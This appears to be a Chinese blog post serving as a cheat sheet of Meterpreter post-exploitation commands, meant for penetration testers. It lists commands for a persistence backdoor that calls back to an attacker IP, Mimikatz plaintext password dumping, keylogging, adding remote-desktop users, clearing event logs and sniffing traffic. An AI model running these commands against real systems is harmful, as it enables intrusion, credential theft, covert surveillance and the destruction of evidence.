Administrator
发布于 2026-02-10 / 1 阅读

Meterpreter 常用命令

Meterpreter 是 Metasploit 框架中的一个强大后渗透模块,提供了丰富的命令用于文件操作、系统控制、网络管理等。以下是一些常用命令的分类和使用方法。

基本命令

  • help:查看所有可用命令。

  • background:将当前会话挂起到后台。

  • sessions -i <ID>:与指定会话交互。

  • exitquit:终止当前会话。

  • run <模块>:执行指定模块,例如 run autoroute

文件系统操作

  • pwd getwd:查看当前工作目录。

  • ls:列出当前目录的文件和文件夹。

  • cd <路径>:切换目录。

  • upload <本地文件> <目标路径>:上传文件到目标主机。

  • download <目标文件> <本地路径>:下载文件到本地。

  • edit <文件路径>:编辑或创建文件。

系统命令

  • sysinfo:查看目标系统信息。

  • getuid:查看当前用户权限。

  • getpid:获取当前进程的 PID。

  • ps:列出所有进程。

  • migrate <PID>:将会话迁移到指定进程。

  • shell:切换到目标主机的命令行模式。

网络命令

  • ipconfig ifconfig:查看网络接口信息。

  • portfwd add -l <本地端口> -p <目标端口> -r <目标IP>:端口转发。

  • route:查看或修改路由表。

  • arp:查看 ARP 缓存表。

截屏与远程桌面

  • screenshot:截取目标主机屏幕。

  • run getgui -e:开启远程桌面。

  • run getgui -u <用户名> -p <密码>:添加远程桌面用户。

键盘记录

  • keyscan_start:开始记录键盘输入。

  • keyscan_dump:导出记录的数据。

  • keyscan_stop:停止键盘记录。

后门植入

  • run persistence -X -i <间隔时间> -p <端口> -r <攻击者IP>:创建开机自启动的后门。

  • run metsvc:安装基于服务的后门。

提权与密码抓取

  • getsystem:尝试提权到 SYSTEM 用户。

  • load mimikatz:加载 Mimikatz 模块。

  • mimikatz_command -f sekurlsa::logonPasswords:抓取明文密码。

日志清除

  • clearev:清除目标主机的事件日志。

网络嗅探

  • use sniffer:加载嗅探模块。

  • sniffer_interfaces:查看可用网卡。

  • sniffer_start <网卡ID>:开始嗅探。

  • sniffer_dump <网卡ID> <文件路径>:导出嗅探数据。

这些命令在后渗透测试中非常实用,但使用时需注意合法性和目标系统的安全性。


评论